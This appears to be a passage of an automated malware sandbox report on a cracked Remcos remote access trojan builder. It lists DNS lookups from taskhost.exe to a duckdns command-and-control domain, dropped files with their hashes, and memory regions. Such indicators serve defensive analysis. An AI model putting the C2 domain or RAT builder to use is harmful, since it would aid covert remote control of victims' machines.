    • 8.8.8.8:53
      dllsys.duckdns.org
      dns
      taskhost.exe
      192 B
      224 B
      3
      3

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Response

      84.220.8.178

      DNS Response

      84.220.8.178

    • 8.8.8.8:53
      dllsys.duckdns.org
      dns
      taskhost.exe
      128 B
      144 B
      2
      2

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Response

      84.220.8.178

    • 8.8.8.8:53
      dllsys.duckdns.org
      dns
      taskhost.exe
      256 B
      272 B
      4
      4

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Response

      84.220.8.178

    • 8.8.8.8:53
      dllsys.duckdns.org
      dns
      taskhost.exe
      64 B
      80 B
      1
      1

      DNS Request

      dllsys.duckdns.org

      DNS Response

      84.220.8.178

    • 8.8.8.8:53
      dllsys.duckdns.org
      dns
      taskhost.exe
      64 B
      80 B
      1
      1

      DNS Request

      dllsys.duckdns.org

      DNS Response

      84.220.8.178

    • 8.8.8.8:53
      dllsys.duckdns.org
      dns
      taskhost.exe
      256 B
      256 B
      4
      4

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

    • 8.8.8.8:53
      dllsys.duckdns.org
      dns
      taskhost.exe
      128 B
      160 B
      2
      2

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Response

      84.220.8.178

      DNS Response

      84.220.8.178

    • 8.8.8.8:53
      dllsys.duckdns.org
      dns
      taskhost.exe
      128 B
      160 B
      2
      2

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Response

      84.220.8.178

      DNS Response

      84.220.8.178

    • 8.8.8.8:53
      dllsys.duckdns.org
      dns
      taskhost.exe
      128 B
      80 B
      2
      1

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Response

      84.220.8.178

    • 8.8.8.8:53
      dllsys.duckdns.org
      dns
      taskhost.exe
      192 B
      224 B
      3
      3

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Response

      84.220.8.178

      DNS Response

      84.220.8.178

    • 8.8.8.8:53
      dllsys.duckdns.org
      dns
      taskhost.exe
      192 B
      240 B
      3
      3

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Response

      84.220.8.178

      DNS Response

      84.220.8.178

      DNS Response

      84.220.8.178

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

      Filesize

      28KB

      MD5

      31e5aec17c9fb39143e7b4541a061832

      SHA1

      33826c5f5e7d5c0c08168c99d336631c34f888d2

      SHA256

      addbc9995756aa52374fe1c25f55cafeaa25db89476fad039c6afcc55392f554

      SHA512

      3fe92e984b6301fb257b542bce6efee1296630429736140537c5e0598ff1b3009e3c589d6f62d9727969cd80715bcdba75de23c16f2db991c20f26b05386c273

    • C:\Users\Admin\AppData\Local\Temp\BuilderProfiles\CustomProfile.ini

      Filesize

      368B

      MD5

      12f205a89a4d82d9ae723a1c1544dfe7

      SHA1

      e585ca1a71ea5f76972b397948596a0297394279

      SHA256

      ce2f9bb0f8b7bf18d6a40ea6afaeca04c66b1c9636b503a4f4eee99003c03901

      SHA512

      0977a7cf7048af957f4ff482ded220d0dbe6a80e26aeebbf527f36c3c5bedd9dc69399a74c70bfd51989d1b732cacc294e1e6d108e450803ba29c62351c53d1f

    • C:\Users\Admin\AppData\Local\Temp\BuilderProfiles\DefaultProfile.ini

      Filesize

      413B

      MD5

      5b9a62933c33daa4abda08df04bf3aa8

      SHA1

      4965b450da81f85747259d4641c051737544212c

      SHA256

      a3baa083b94ed441878ae15367a9502f2e8c9f1fa62af5a36f89fae03391679f

      SHA512

      4a216f518741f5d4545908c5a32461255ffd874713105aedcc244da76f85ef039d7ddaa29b482abe0e80782dc86b429bb4096cd2c56402cfc140a938ad7c4046

    • C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222.exe

      Filesize

      17.4MB

      MD5

      c3c21fa4c2186deb641455482ab0d3aa

      SHA1

      2f4b49e8383e073ccb965943ce970de403412567

      SHA256

      4ea203509d0fdff3e31f976413c546ca3d36133bc708e9a1301860961cc3a8d9

      SHA512

      31db2963f1bd49f7b4a6ee38e54940d20120d6c05ef7bf34ec97eb93051bee6d5428e9e1271e4ae8f5544b824188ac7278315e2e2c27be302a312eebbf8c3fb7

    • C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222\Remcos_Settings.ini

      Filesize

      881B

      MD5

      a3468935e33e361cf94f4721ed4cb66d

      SHA1

      c3b19ca8382534b2179940cabede8c6c952a9c06

      SHA256

      b374af58c24b6085f64f979dab434643da39d0267a27975f396473327dc98c7d

      SHA512

      c1caa0b9637a46187d54b2952db204182fad5a5324574949ce4db13bdb17624ccd8b3228eb9b2bcfe5851add2c5d2f586945e7264b1d1cd02d91acf1fd81583a

    • C:\Users\Admin\AppData\Local\Temp\Remcos_Settings.ini

      Filesize

      82B

      MD5

      95f6852f90f90842cb66c0ee6529fcb3

      SHA1

      beb85551bba15b8777cf05b825e38056391336d5

      SHA256

      df27d865a102b728c7308d0e4d6b7ff4a6040a11da882da6ab0f2f1c463bdec6

      SHA512

      62bd0df98699eab40bc79ebc38d3b40caef1099c7d0607af54e7df90e7a721091d8f46fa0fdd4bee1894588cf25200d2cf947afcc1c56a79fc259aa4286d76ae

    • C:\Users\Admin\AppData\Local\Temp\sysinfo.txt

      Filesize

      84KB

      MD5

      4eddddfa90e4476f37f8831dfefb45cc

      SHA1

      1e3b5c6e61c0e93cfb5afc9d54f497904b76083b

      SHA256

      6662993180919d8268a376c4532d65dfac4e03346cfdb836350d618f2bce25ed

      SHA512

      04a34eb18fe7bb1676d1f0d81962ce2628c8181af091bdd6d7bda4dcc8e20e2aea600b63bf136ea8e831c47637878410a06c1d132c751bd5598e86f61fe6c2e6

    • C:\Users\Admin\AppData\Local\Temp\taskhost.exe

      Filesize

      256KB

      MD5

      8fdf47e0ff70c40ed3a17014aeea4232

      SHA1

      e6256a0159688f0560b015da4d967f41cbf8c9bd

      SHA256

      ed9884bac608c06b7057037cc91d90e4ae5f74dd2dbce2af476699c6d4492d82

      SHA512

      bd69d092ed4f9c5e1f24eaf5ec79fb316469d53849dc798fae0fcba5e90869b77ee924c23cc6f692198ff25827ab60ad47bb46cadd6e0aadde7731cbafb013be

    • C:\Users\Admin\AppData\Local\Temp\uninstall.vbs

      Filesize

      476B

      MD5

      6637594caef89c983a0c5970e7c733ad

      SHA1

      3ba9beab42b301d9468ded05360fc6285b4b34d9

      SHA256

      fbbe7c722846dc7904fa69a872a38ece7561ec0a330ffa83ea4600f9c03a22d1

      SHA512

      d7de2fbb77e5d606551f048d349b00011b8da7b4d278477e1380d7dfed89dff74939d74df8ce552715e7fa3a6e7c8af7c173c8ae7f147b037d399fff496b17d1

    • C:\Users\Admin\Desktop\remcos_agent.exe

      Filesize

      84KB

      MD5

      6b84faafeeb491220f156674917470d0

      SHA1

      0c968e3360b3389dd0fb5cff143ae9c676aa6c3e

      SHA256

      7df203f7e6863deda9c14a7afaec2b058b678d03f336fc7a3ebd4c171e3e1605

      SHA512

      d237643b4d164b026b5b8bec2cc9dcaf01e9e0e085b98bbbedcdb1e6ea351ee3330edd25c1df93294c393fa765a00d0a98bf21f3be35ecbeae676fbe6556cb16

    • memory/1616-164-0x00000000029A0000-0x00000000029A1000-memory.dmp

      Filesize

      4KB

    • memory/1616-162-0x00000000029A0000-0x00000000029A1000-memory.dmp

      Filesize

      4KB

    • memory/1616-156-0x00000000029A0000-0x00000000029A1000-memory.dmp

      Filesize

      4KB

    • memory/1616-155-0x00000000029A0000-0x00000000029A1000-memory.dmp

      Filesize

      4KB

    • memory/1616-161-0x00000000029A0000-0x00000000029A1000-memory.dmp

      Filesize

      4KB

    • memory/1616-165-0x00000000029A0000-0x00000000029A1000-memory.dmp

      Filesize

      4KB

    • memory/1616-167-0x00000000029A0000-0x00000000029A1000-memory.dmp

      Filesize

      4KB

    • memory/1616-157-0x00000000029A0000-0x00000000029A1000-memory.dmp

      Filesize

      4KB

    • memory/1616-166-0x00000000029A0000-0x00000000029A1000-memory.dmp

      Filesize

      4KB

    • memory/1616-163-0x00000000029A0000-0x00000000029A1000-memory.dmp

      Filesize

      4KB

    • memory/3212-32-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/3212-42-0x0000000005620000-0x000000000562A000-memory.dmp

      Filesize

      40KB

    • memory/3212-40-0x0000000005690000-0x0000000005722000-memory.dmp

      Filesize

      584KB

    • memory/3212-35-0x0000000005B60000-0x0000000006106000-memory.dmp

      Filesize

      5.6MB

    • memory/3252-109-0x0000000000400000-0x0000000002991000-memory.dmp

      Filesize

      37.6MB

    • memory/3252-27-0x0000000000400000-0x0000000002991000-memory.dmp

      Filesize

      37.6MB

    • memory/3252-41-0x0000000000400000-0x0000000002991000-memory.dmp

      Filesize

      37.6MB

    • memory/3252-39-0x0000000000762000-0x000000000181E000-memory.dmp

      Filesize

      16.7MB

    • memory/3252-25-0x0000000002FD0000-0x0000000002FD1000-memory.dmp

      Filesize

      4KB

    • memory/3252-24-0x0000000002FC0000-0x0000000002FC1000-memory.dmp

      Filesize

      4KB

    • memory/3252-23-0x0000000002FB0000-0x0000000002FB1000-memory.dmp

      Filesize

      4KB

    • memory/3252-22-0x0000000002FA0000-0x0000000002FA1000-memory.dmp

      Filesize

      4KB

    • memory/3252-21-0x0000000002F70000-0x0000000002F71000-memory.dmp

      Filesize

      4KB

    • memory/3252-20-0x0000000002F60000-0x0000000002F61000-memory.dmp

      Filesize

      4KB

    • memory/3252-19-0x0000000002F40000-0x0000000002F41000-memory.dmp

      Filesize

      4KB

    • memory/3252-28-0x0000000000762000-0x000000000181E000-memory.dmp

      Filesize

      16.7MB

    • memory/3252-26-0x0000000002FE0000-0x0000000002FE1000-memory.dmp

      Filesize

      4KB

    • memory/4572-115-0x0000000002B70000-0x0000000002B71000-memory.dmp

      Filesize

      4KB

    • memory/4572-111-0x0000000002A20000-0x0000000002A21000-memory.dmp

      Filesize

      4KB

    • memory/4572-113-0x0000000002A50000-0x0000000002A51000-memory.dmp

      Filesize

      4KB

    • memory/4572-119-0x0000000000400000-0x0000000002991000-memory.dmp

      Filesize

      37.6MB

    • memory/4572-112-0x0000000002A40000-0x0000000002A41000-memory.dmp

      Filesize

      4KB

    • memory/4572-114-0x0000000002B60000-0x0000000002B61000-memory.dmp

      Filesize

      4KB

    • memory/4572-118-0x0000000002BA0000-0x0000000002BA1000-memory.dmp

      Filesize

      4KB

    • memory/4572-117-0x0000000002B90000-0x0000000002B91000-memory.dmp

      Filesize

      4KB

    • memory/4572-116-0x0000000002B80000-0x0000000002B81000-memory.dmp

      Filesize

      4KB

    • memory/4680-153-0x0000000002260000-0x0000000002267000-memory.dmp

      Filesize

      28KB

    • memory/4680-152-0x0000000002260000-0x0000000002267000-memory.dmp

      Filesize

      28KB

    • memory/4952-44-0x0000000074A90000-0x0000000075241000-memory.dmp

      Filesize

      7.7MB

    • memory/4952-34-0x0000000074A9E000-0x0000000074A9F000-memory.dmp

      Filesize

      4KB

    • memory/4952-38-0x0000000074A90000-0x0000000075241000-memory.dmp

      Filesize

      7.7MB

    • memory/4952-0-0x0000000074A9E000-0x0000000074A9F000-memory.dmp

      Filesize

      4KB

    • memory/4952-4-0x000000000D4F0000-0x000000000E672000-memory.dmp

      Filesize

      17.5MB

    • memory/4952-3-0x0000000074A90000-0x0000000075241000-memory.dmp

      Filesize

      7.7MB

    • memory/4952-2-0x0000000005E40000-0x0000000005EDC000-memory.dmp

      Filesize

      624KB

    • memory/4952-1-0x0000000000260000-0x000000000140E000-memory.dmp

      Filesize

      17.7MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.